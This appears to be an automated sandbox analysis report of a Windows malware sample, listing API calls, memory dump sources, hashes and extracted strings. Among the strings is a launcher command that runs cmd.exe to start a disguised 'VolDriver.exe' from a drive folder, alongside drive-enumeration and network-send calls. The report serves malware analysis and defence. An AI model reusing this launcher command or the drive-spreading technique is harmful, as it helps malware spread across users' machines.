                                                                          • LeaveCriticalSection.KERNEL32(00416C40,?,?,?,?,?,?,0040BB4E,00000000,0040D2E4,?), ref: 00406248
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                          • String ID:
                                                                          • API String ID: 1457358591-0
                                                                          • Opcode ID: 11af4e60f864a1ee5d179f7b11f5f910824527e1023db5757fbef91574a235bf
                                                                          • Instruction ID: e6130a6dfe54c84fffd3ba92570c30583d1ab1b9d3ba2be6bfb3361b08162579
                                                                          • Opcode Fuzzy Hash: 11af4e60f864a1ee5d179f7b11f5f910824527e1023db5757fbef91574a235bf
                                                                          • Instruction Fuzzy Hash: 9E71C0B4E002099BCB08CF94D885FEFB7B1EB58304F14816DE905BB382D679A951CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E53C
                                                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E58B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E59F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E5B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeStringlstrcmpi
                                                                          • String ID: device$deviceType
                                                                          • API String ID: 1602765415-3511266565
                                                                          • Opcode ID: 39f9f528da6740926d138b1d171382c786ebff15b53edfaaf651e03a90bfcec8
                                                                          • Instruction ID: 3069ab4536640b36b0e12cde36f3ec166fb94fe14c65d0f959ecac372860a23d
                                                                          • Opcode Fuzzy Hash: 39f9f528da6740926d138b1d171382c786ebff15b53edfaaf651e03a90bfcec8
                                                                          • Instruction Fuzzy Hash: 9D411A74A0020AEFDB14CFD5C884BAFB7B5AF48304F108969E505A7390E778EA81CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E3DC
                                                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E42B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E43F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E457
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeStringlstrcmpi
                                                                          • String ID: service$serviceType
                                                                          • API String ID: 1602765415-3667235276
                                                                          • Opcode ID: bf09d843f4898c9c3c4f2d30c91472c51ed62ef352af0ed2c58ac9276ee8b6d4
                                                                          • Instruction ID: 3ee3a309e4cad0d77f423f26d7802281532f5296dcc9ab773efb6af10bc721e7
                                                                          • Opcode Fuzzy Hash: bf09d843f4898c9c3c4f2d30c91472c51ed62ef352af0ed2c58ac9276ee8b6d4
                                                                          • Instruction Fuzzy Hash: 7A413BB5A0020ADFCB04DF99C884FAFB7B5BF48304F108569E504A73A0D778AE85CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID:
                                                                          • API String ID: 3168844106-0
                                                                          • Opcode ID: deb87a967b968b8c04415f7d1b08356640ab07502f924b2abe67f0fdf4d4051f
                                                                          • Instruction ID: a595f2b535375a145ed5326f987dfcc9cad8dea697baa589e2f3a50a699b5d5f
                                                                          • Opcode Fuzzy Hash: deb87a967b968b8c04415f7d1b08356640ab07502f924b2abe67f0fdf4d4051f
                                                                          • Instruction Fuzzy Hash: 2A31E372200215ABC710AFB5ED8CAD7B798FF54314F04463EF54DD3280DB79A4449B99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 0040640B
                                                                          • CoCreateInstance.OLE32(00412768,00000000,00000001,00412748,?), ref: 00406423
                                                                          • wsprintfW.USER32 ref: 00406456
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstancewsprintf
                                                                          • String ID: $h@$%windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                          • API String ID: 2038452267-1952734972
                                                                          • Opcode ID: aa8a32cb6d162733ff770eaad9f94bc5271c9336f419dc8e96cac525845bdcf3
                                                                          • Instruction ID: ff343e69aad13d9306a4779b19c6e3e8efaa2fda419abce3ce5a22e1d679f985
                                                                          • Opcode Fuzzy Hash: aa8a32cb6d162733ff770eaad9f94bc5271c9336f419dc8e96cac525845bdcf3
                                                                          • Instruction Fuzzy Hash: 0631D975A40208EFCB04DF98D885EDEB7B5EF88704F108199E519A73A5CB74AE81CB54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E53C
                                                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E58B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E59F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E5B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeStringlstrcmpi
                                                                          • String ID: device$deviceType
                                                                          • API String ID: 1602765415-3511266565
                                                                          • Opcode ID: 5397dffdce9bfa1d28fd9043f65dc7fff47123e69829d8d1bf88c428b6381307
                                                                          • Instruction ID: 4edf041377c7e14b34ff85b7b029659f12f4b503add3d656b401b028ce93b30a
                                                                          • Opcode Fuzzy Hash: 5397dffdce9bfa1d28fd9043f65dc7fff47123e69829d8d1bf88c428b6381307
                                                                          • Instruction Fuzzy Hash: AB31DC70A0010AEFDB14CFD5DC84BAFB7B5AF48304F108969E515A7390E778EA45CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E3DC
                                                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E42B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E43F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E457
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeStringlstrcmpi
                                                                          • String ID: service$serviceType
                                                                          • API String ID: 1602765415-3667235276
                                                                          • Opcode ID: f7a49091048d5f2f7edd1107e0f91d764ba8354fbf103c94dbc5479e42702eb7
                                                                          • Instruction ID: ed37c26d591e2f51ed35895ea84be071d11e51b9472e036d4bc20704c2c7b13d
                                                                          • Opcode Fuzzy Hash: f7a49091048d5f2f7edd1107e0f91d764ba8354fbf103c94dbc5479e42702eb7
                                                                          • Instruction Fuzzy Hash: 0E31EAB1A0020ADFCB04DF99D884FAFB7B5BF48304F108569E515B73A0D778AA85CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                          • String ID: %s%s
                                                                          • API String ID: 1447977647-3252725368
                                                                          • Opcode ID: 588e7e45e4f33f9d0918584f63058166f89edb9a452884b7bd86cb7a942d91ee
                                                                          • Instruction ID: a0bb0d1763f58919fadf504be34b28e9f79e59c8b133fe7279793914b8ec670d
                                                                          • Opcode Fuzzy Hash: 588e7e45e4f33f9d0918584f63058166f89edb9a452884b7bd86cb7a942d91ee
                                                                          • Instruction Fuzzy Hash: 92310AB0D05218EFCB50DF99DC88BDDBBB4FB48304F1085AAE609B6290D7795A84CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLogicalDrives.KERNEL32 ref: 00406346
                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                          • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                          • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                          Strings
                                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                                                          • NoDrives, xrefs: 004063B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseDrivesLogicalOpenQueryValue
                                                                          • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                          • API String ID: 2666887985-3471754645
                                                                          • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                          • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                                                          • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                          • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D3C4
                                                                            • Part of subcall function 0040D490: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D4D0
                                                                            • Part of subcall function 0040D490: CloseHandle.KERNEL32(?), ref: 0040D4E9
                                                                          • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D41F
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D45C
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D467
                                                                          • DuplicateHandle.KERNEL32(00000000), ref: 0040D46E
                                                                          • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D482
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                          • String ID:
                                                                          • API String ID: 2251373460-0
                                                                          • Opcode ID: 5fa48f327af51f71990b0ea36d5f90ef72817f248d38badcc5e164c225a1f3f1
                                                                          • Instruction ID: 3905a71daa0159e526e2bdbd6071991b109cebefbf6d86c4cf37b1ecd5ad8e98
                                                                          • Opcode Fuzzy Hash: 5fa48f327af51f71990b0ea36d5f90ef72817f248d38badcc5e164c225a1f3f1
                                                                          • Instruction Fuzzy Hash: F831F8B4A00208EFDB04DF94D889F9EBBB5EB48308F0081A9E945A7390D775AA95CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _allshl_aullshr
                                                                          • String ID:
                                                                          • API String ID: 673498613-0
                                                                          • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                          • Instruction ID: a69f75a9761dffb427665dfb7b283027f7726bbdceffba7061474d3de6b788b4
                                                                          • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                          • Instruction Fuzzy Hash: 0B111F326005186B8B10EF5EC44268ABBD6EF84361B15C136FC2CDF35AD675D9414BD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                          • htons.WS2_32(?), ref: 00401281
                                                                          • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                          • String ID: pdu
                                                                          • API String ID: 2164660128-2320407122
                                                                          • Opcode ID: 91b30ad39cb42ad1c5fa696c873bf215f40042e2e73f1e3bbc8ac8a0414f7340
                                                                          • Instruction ID: 2eaa47314137ae48bc86a2d98b28c98b453a90a93c27253c89cefaff09ddeb80
                                                                          • Opcode Fuzzy Hash: 91b30ad39cb42ad1c5fa696c873bf215f40042e2e73f1e3bbc8ac8a0414f7340
                                                                          • Instruction Fuzzy Hash: 7031B2362083009BC710DF6DD880A9BBBE4AFC9714F04457EFD98A7382D6349914C7AB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                            • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                            • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                            • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                          • String ID:
                                                                          • API String ID: 3966618661-0
                                                                          • Opcode ID: 5b1d9706ac0f4861890903663e3aab6c9f99d0d6f1a575e52deddebed6e66e4c
                                                                          • Instruction ID: 99e37592b547e3d1ed5d588db8744cb94e6869326ec40c3cf91f75bef10dfbd8
                                                                          • Opcode Fuzzy Hash: 5b1d9706ac0f4861890903663e3aab6c9f99d0d6f1a575e52deddebed6e66e4c
                                                                          • Instruction Fuzzy Hash: CA41A175604B02ABC718DB39D848797F3A4BF84314F14827EE82D933D1E739A855CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00417490,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AE58
                                                                          • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AE79
                                                                          • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AE83
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040AE8D
                                                                          • InterlockedExchange.KERNEL32(00416068,0000003D), ref: 0040AE9A
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                          • String ID:
                                                                          • API String ID: 442028454-0
                                                                          • Opcode ID: 357d87ca73b11ea0aaada163076beaff9b4c740b73e671433b9cbd3897c2d74f
                                                                          • Instruction ID: 0da220b8b1f77c32e275edd0b19d3e77d455ccd5d956affd98337f50121a7ab7
                                                                          • Opcode Fuzzy Hash: 357d87ca73b11ea0aaada163076beaff9b4c740b73e671433b9cbd3897c2d74f
                                                                          • Instruction Fuzzy Hash: D5315EB8A40309EBCB14CF98DC45F9EB771FB48300F208569E51567390D774AA51CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _allshl
                                                                          • String ID:
                                                                          • API String ID: 435966717-0
                                                                          • Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                          • Instruction ID: bcae3434c2129d449cda67bd59c491ccebf17daabcdef2e049336039ec6bac91
                                                                          • Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                          • Instruction Fuzzy Hash: 3EF03172901428AB9750EEFF85424CBF7E69F98365F218176F81CE3261E9709D0546F2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
                                                                          • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
                                                                          • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C
                                                                            • Part of subcall function 0040A3F0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A44B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                          • String ID: pdu
                                                                          • API String ID: 309973729-2320407122
                                                                          • Opcode ID: e0f329f12d2259528821c27011c0918a976d96f57bacaacdd1962e62a77ab920
                                                                          • Instruction ID: d174ec339e303b727d6f690e0c81bd26c44cc0430c196550e953614590448db6
                                                                          • Opcode Fuzzy Hash: e0f329f12d2259528821c27011c0918a976d96f57bacaacdd1962e62a77ab920
                                                                          • Instruction Fuzzy Hash: 0C01D6765003009BCB249F55ECC0D9B7769AF49311704467AFC05AB396C638E8508775
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                                                          • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                                                          • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeviceDriveQueryType
                                                                          • String ID: \??\
                                                                          • API String ID: 1681518211-3047946824
                                                                          • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                          • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                                                          • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                          • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(`k@,80000000,00000001,00000000,00000003,00000000,00000000,00406B60), ref: 0040E9D0
                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E9E5
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040E9F2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleSize
                                                                          • String ID: `k@
                                                                          • API String ID: 1378416451-1195631054
                                                                          • Opcode ID: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                                                          • Instruction ID: 241503f102ff988800a1529ff4214dfa730f02490b079578101ca7fb38dafef3
                                                                          • Opcode Fuzzy Hash: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                                                          • Instruction Fuzzy Hash: F7F01C74A40308FBDB20DFA4DC49B8DBBB4AB04701F208295FA04BB2D0D6B56A908B44
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
